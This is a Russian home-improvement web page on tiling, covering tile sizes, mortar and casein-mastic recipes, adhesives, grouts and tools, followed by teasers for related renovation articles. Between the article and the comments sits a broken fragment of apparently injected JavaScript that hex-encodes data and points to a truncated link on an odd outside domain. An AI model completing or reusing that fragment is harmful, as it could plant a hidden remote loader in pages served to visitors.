Интернет-магазин ОБИ

штукатурно-плиточные работы

поделиться

Облицовка гипсокартонными листами (сухой штукатуркой)

О гигиеничности, удобстве, эстетичности облицовочных покрытий из плитки едва ли стоит говорить — они известны каждому: они водонепроницаемы, устойчивы ко всем применяемым в обиходе химическим веществам, легко моются и чистятся, повышают комфортность помещений. К стенам и полам плитки крепятся с помощью цементного раствора, масляной краски, казеиново-цементной мастики и специальных мастик.

Материалы и инструменты для плиточных работ. Плитки. Керамические плитки выпускаются глазированными и неглазированными, квадратными и прямоугольными. Стандартные размеры плиток и их количество, укладываемое на 1 м2, приведены в таблице 14.

Таблица 14

Размеры плитки, мм Количество плиток на 1м2, шт. 100х100 100 108х108 87 150х150 44 152х152 43 150х200 34 200х200 25 200х300 16

Цветовая гамма выпускаемых плиток весьма разнообразна — белые, цветные, орнаментированные. Тыльная сторона плиток имеет рифленую поверхность, улучшающую их сцепление с раствором или мастикой. В зависимости от исходного сырья плитки изготовляются двух видов — фаянсовые и майоликовые. Глазурь на майоликовых плитках придает им высокие художественные достоинства. Плитки для полов бывают одно- и многоцветными, имеют гладкую либо шероховатую поверхность: изготовляются квадратными, шестигранными и восьмигранными, штучными или в виде ковров. Толщина плиток для пола 6—13 мм. Плитки керамические для мозаичных полов выпускаются квадратными (23х23мм, 48х48мм, 150х150мм) и прямоугольными (48х23 и 150х75 мм) толщиной 4—9 мм. Полистирольные плитки имеют различные расцветки и размеры: 100х125х1,25; 150х150х1,35; 300х150х1,35; 150х200х1,25; 100х50х1,25; 150x20х1,35 мм. К плиткам квадратным и прямоугольным и в дополнение к ним для облицовки углов и криволинейных поверхностей выпускаются плитки фасонные — угловые, карнизные, плинтусные, бордюрные. Кроме того, в продажу поступают плитки-мыльницы и плитки-полотенцедержатели.

Промежутки между стеной и ванной, раковиной и каким-либо выступом закрывают плитками в форме узких скругленных полос. Часто они продаются в комплекте с прямоугольными, угловыми и торцевыми плитками. Существенный момент — форма краев и кромок плиток. Они бывают трех типов: 1) плитки типа «универсал» со скошенными краями, которые укладывают без зазора так, что на стыках образуются канавки, расшиваемые впоследствии цементом. В каждой упаковке имеются одна-две плитки с глазурованными краями для укладки по краю или в углах; 2) плитки с прямыми кромками укладывают, помещая между ними пластмассовые крестики, обеспечивающие равномерность швов. Кромки таких плиток не глазурованы. Края облицовки закрывают пластмассовыми декоративными накладками; 3) плитки со скругленными краями.

Средства для крепления плиток. Цементные растворы для наклеивания плиток имеют следующие составы: для стен 1:4, для полов — от 1:5 до 1:6 (это означает, что на одну часть цемента берут 4—6 частей песка).

Казеиново-цементная мастика применяется для облицовки стен. Ее готовят так: на три части портландцемента марки 400 или 500 берется одна часть казеинового клея марки ОБ, одна часть мелкозернистого речного песка, 2,5 части воды. Казеиновый клей тщательно перемешивают с водой до полного разбухания зерен клея. Далее приготавливают сухую цементно-песчаную смесь, всыпают ее в казеиновый клей и тщательно перемешивают. Если появляются комки, мастику процеживают через сито с ячейками 1х1 мм. Надо иметь в виду, что в готовую мастику нельзя добавлять казеин или цемент.

Мастику необходимо использовать в течение двух часов. Ее наносят на облицовываемую поверхность слоем до пяти миллиметров или на тыльную сторону плиток. Особенно хорошо ложится эта мастика на ровную штукатурку, если наносить ее тонким слоем. Керамические, полистирольные и поливинилхлоридные плитки можно наклеивать на стены с помощью готовых клеев и мастик: Клей-71, «Бустилат», «Стилит», ПС-5, «Гумилакс», «Акрилакс», «Гермелакс». Мастики и клеи «Бустилат» и «Стилит» наносят шпателем только на стену и сразу накладывают плитки, слегка прижимая их. Схватываются эти средства спустя 24 часа, «Гумилакс» и «Акрилакс» — через трое суток. Стены помещений с повышенной влажностью облицовывают с использованием водостойкого акрилового клея. Клеи на цементной основе (более соответствующие напольным покрытиям) используют там, где неровности поверхности компенсируются слоем клея толщиной более 3 мм. Для повышения водостойкости облицовываемых поверхностей применяют специальные грунтовки.

При наклеивании плиток к дереву, кирпичу, бетону штукатурке (если поверхность предварительно проолифлена или покрашена масляной краской) можно использовать масляную густотертую краску. Ее надо наносить слоем в 1—2 мм на плитку или на стену. Перед нанесением краски плитки нужно очистить от пыли. При прижимании плиток к стенке из-под них выдавливается краска, которую сразу же следует убрать плитки, протереть тряпкой, смоченной в керосине, бензине или другом растворителе. Хорошо держится плитка, приклеенная к водоэмульсионной краске, но случается, что эта краска, размягченная клеем, начинает отслаиваться от стены. Чтобы избежать этого, следует шпателем процарапать по слою краски диагональную сетку, тогда клей схватится непосредственно со стеной. Межплиточные швы шириной до 6 мм можно заделывать силиконовым или акриловым герметиками, которые бывают разных цветов, удобнее всего пользоваться картриджами или патронами с герметизирующим составом.

Составы для расшивки швов (затирки). Они бывают акриловыми, полностью готовыми к применению и расфасованными в банки, и в виде сухих смесей на основе цемента, упакованных в мешки. С цементными составами работать несколько легче. Те и другие затирки достаточно водостойки, но лишь настолько, чтобы противостоять брызгам и струям душа, но они не выдерживают постоянного напора воды, например, в бассейне. Такие составы нельзя использовать также для облицовки поверхностей, контактирующих с продуктами питания, так как они обладают низкими бактерицидными свойствами. В таких случаях применяют эпоксидные составы — они полностью водонепроницаемы и после полимеризации нетоксичны. Но с ними сложнее работать, и они дороже акриловых и цементных.

Инструменты. Плиточные работы производятся с помощью таких инструментов, как кельма, зубило, молоток, клещи, кусачки, плоскогубцы, правило, угольник, полутерки, отвес, уровень. Помимо этих инструментов, пригодится молоточек весом 60—80 г из крепкой стали с острым концом для перерубания плиток. Впрочем, для этой цели можно использовать и зубило. Для резки глазурованных плиток нужен стеклорез или резец с приваренным твердосплавным (победитовым) наконечником. Существуют и специальные резаки.

Кромки отколотых или разрезанных плиток необходимо притирать, для чего можно использовать абразивные материалы, способные обтачивать керамическую плитку. Для сортировки плиток по размеру нужно иметь шаблон, который состоит из двух перпендикулярных друг к другу брусков: вертикального, с делениями через 1 мм, и горизонтального.

// t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

">https://bw95vpjda...u/f.html">

Комментарии: 0

Комментарии (0)

Добавить комментарий

180 символов

Ваш комментарий:

Похожие статьи

Ремонт и Строительство

Дачный ремонт: смена интерьера с минимальными затратами

16 мая 2018

Домик у нас, как большинство у большинства россиян, капитальный, но бюджетный, да еще и строился несколькими поколениями поэтапно. Поэтому родительская половина – из кирпича, наша – из кругляка (бревенчатая то есть), а веранда, которую пристроили уже совсем недавно, вообще из подручных материалов. Но, как выяснилось в процессе косметического ремонта, это не так уж плохо.  Только без жертв Я не буду говорить, что домик, который всю зиму стоит без отопления, а активно эксплуатируется только летом, в первую очередь, нуждается в регулярном осмотре кровли, фундамента и фасада. Тут ремонт нужен чаще и капитальнее. Сейчас не об этом. Нам захотелось отремонтировать, вернее, привести в симпатичный вид так называемую гостиную – самую большую комнату в доме. Потому что этим летом не только супруга с двумя детьми будут традиционно жить на даче, но еще пригласили подругу с ребенком и бабушкой. В общем, передо мной встала задача быстро, качественно и дешево (лишних денег сегодня нет у подавляющего большинства соотечественников) преобразить это не совсем стандартное помещение. Оно как раз находится на стыке двух половин, поэтому одна стена в гостиной кирпичная, а три других – из кругляка. На первом этапе попытался понять, на чем можно сэкономить больше всего. 1.На бригаде отделочников, если делать нехитрый ремонт своими руками. 2.На покупке необходимого «тяжелого» инструмента. Валики для краски, разумеется, можно и купить, а вот электроперфоратор, лобзик или что-то подобное, чего у вас нет, и на постоянной основе не потребуется, можно арендовать. Сейчас такие услуги распространены. Если ремонт – ваше постоянное увлечение, лучше купить. В конечном итоге выйдет дешевле. 3.На подробной смете. Если не составить сразу перечень всего, что нужно, то а «вот этого же еще мешков пять» и «килограмма три на глаз вот того» повлечет лишние расходы и ненужные остатки. 4.Начинать ремонт обязательно с самой дальней от выхода из дома комнаты, иначе строительная грязь нанесет неизбежный ущерб уже отремонтированным помещениям, через которые вы будете ходить. Что-то придется исправлять, а это дополнительные траты.  {art%} Планируем переделку Для начала определил минимальный объем работ, который удовлетворил представление супруги о «прекрасном». Главная претензия к комнате была – ее жуткая эклектика. На практике модное дизайнерское словечко означало: кое-как оклеенную обоями кирпичную стену, прямо по кирпичам. Брус был просто покрыт лаком, цвет дерева сохранился, ну, и самый ужас – мебель и прочие элементы интерьера. Тут, по старинной русской традиции, вторую жизнь обрело все, что жалко было выбросить. Мне предстояло: •привести в приличный вид стены, пол и потолок,  •обновить мебель, в идеале, чтобы не покупать новую, •с помощью супруги декорировать помещение, создать уют. Мы не очень любим стиль лофт, но тут вынуждены были взять его за основу в качестве компромисса, чтобы не штукатурить кирпич, поскольку делать этого я не умею, а учиться не планировал.  Решили снять старые обои и покрасить все стены краской, объединив таким образом и материал, и фактуру. Забегая вперед, скажу, что получился у нас в конечном итоге не лофт, а, скорее, скандинавский стиль. А он нам вполне по душе.  Но прежде я осмотрел весь пол на предмет прочности и надежности. В условиях зимней сырости лаги страдают чаще всего, парочку пришлось заменить, использовал для этого брус 48х48. Все-таки трое детей и пожилой человек будут жить, поэтому безопасность превыше всего.  •Пропитал бруски защитным составом, он спасает от повышенной влажности и плесени.  •Часть досок пола тоже заменил. Обработал тем же составом. Циклевать пол не стал, доски достаточно гладкие.  •Щели зашпаклевал специальной шпатлевкой по дереву.  Пляшем от стен Обои с кирпичной стены отошли очень легко, с брусом пришлось повозиться – старый лак зачистил наждачкой. Не до конца – это очень долго, а так, чтобы сделать поверхность шершавой. Дальше нужно обязательно было обезжирить брус растворителем и хорошо обработать все стены грунтовкой праймер. Праймер в данном случае выполняет две очень важных задачи: укрепляет поверхность и дерева, и кирпича, что в нашем случае актуально: где-то цемент может сыпаться между кирпичами, где-то дерево слоиться. Также праймер улучшает адгезию – сцепление нового слоя краски со старым лаком.  Грунтовку, да и краску удобнее на кирпичную стену наносить валиком с длинным ворсом, чтобы компенсировать рельефность.  Брус для ускорения красил маленьким валиком, но стыки все равно пришлось прокрашивать кистью. Так что можно изначально пользоваться широкой кистью, я думаю.  Окна гостиной выходят на солнечную сторону. Поэтому цвет для стен решили выбрать светлый. Не белый: для дачи и детей слишком уж маркий. Бежевый отвергли по причине банальности. Остановились на холодном светло-светло сером оттенке. Краску выбрали универсальную, укрывистая, не течет, подходит и для кирпича, и для дерева, заколеровали в один цвет. Пространство после покраски сразу стало единым, хотя за счет фактуры, кажется, что краска чуть отличается по оттенку. Но это даже неплохо.  Потолок просто покрасил той же краской без колера, пол затонировал морилкой в цвет светлого дуба, для чего развел ее водой, после высыхания покрыл матовым лаком. Он не скользит.  Все лакокрасочные материалы выбирал экологичные, а алкидный лак предпочел за способность быстро сохнуть и устойчивость к истиранию.  Интерьер решает все Когда пространство было готово, мы решили все-таки отказаться от стиля лофт, хотя модная кирпичная стена отчаянно к этому взывала. Но супруга нашла в родительских залежах большой отрез ткани – грубого льна, которого хватило на шторы, которые из-за солнечной стороны посадили на подкладку. Из этой же ткани жена сама сшила чехлы на мебель. Таким образом, разномастные диван и два кресла из «совдепии» стали вполне современным и стильным комплектом. Остатки ткани ушли на подушки для старых стульев, которые я ошкурил и покрасил остатками краски от стен. Стол тоже обновили в тон полу. Той же морилкой и лаком я покрыл несколько простых деревянных ящиков и сделал из них стильные полки, прикрепив дном к стене.  А часть стен жена декорировала детскими рисунками. Если поместить их в хорошие рамы и сделать паспорту из коричневого картона, получается невероятно стильно! На интерьер мы в итоге все же немного потратились. Купили недорогой, подходящий по стилю светильник с деревянными элементами. А потом зашли в садовый отдел и не удержались: купили комплект из пары отличных садовых кресел из искусственного ротанга и небольшого столика. Кто сказал, что ими нельзя пользоваться в помещении? Они прекрасно вписались в интерьер, а заодно решили массу вопросов: дополнительные места, которые легко моются в случае ущерба от грязи, а выдвижные подставки для ног мы будем использовать либо по прямому назначению, либо в качестве дополнительных сидячих мест, в случае если дети друзей приведут. Они уже облюбовали кресла и столик для игр и рисования.  Буду рад, если наш опыт окажется кому-то полезен!

15 декабря

141

0

Ремонт и Строительство

Выбор и укладка паркета

09 апреля 2018

Выбор напольного покрытия – ответственный и важный этап в процессе ремонта. Именно пол собирает воедино эстетическое восприятие комнаты в целом, при некачественном или давно ремонтируемом покрытии внешний вид помещения будет испорчен. Паркет любим потребителем за натуральность и дорогой внешний вид, долгий срок службы покрытия позволяет экономить на многочисленных ремонтах, а при правильном уходе за паркетом спустя несколько лет напольное покрытие будет выглядеть как новое. Рассмотрим подробнее нюансы выбора паркета.

15 декабря

92

0

Ремонт и Строительство

Укладка линолеума своими руками

04 апреля 2018

Во время ремонта хозяева квартир часто стараются сэкономить на работах, доступных для самостоятельного выполнения. Укладка линолеума – один из видов таких работ, поскольку не требует применения дорогостоящей или узкоспециализированной техники, изучить теоретические основы просто и займет минимум времени. Но чтобы остаться довольным результатом, не советую пренебрегать базовой подготовкой к работе: знание особенностей и тонкостей монтажа поможет избежать ошибок.

15 декабря

146

0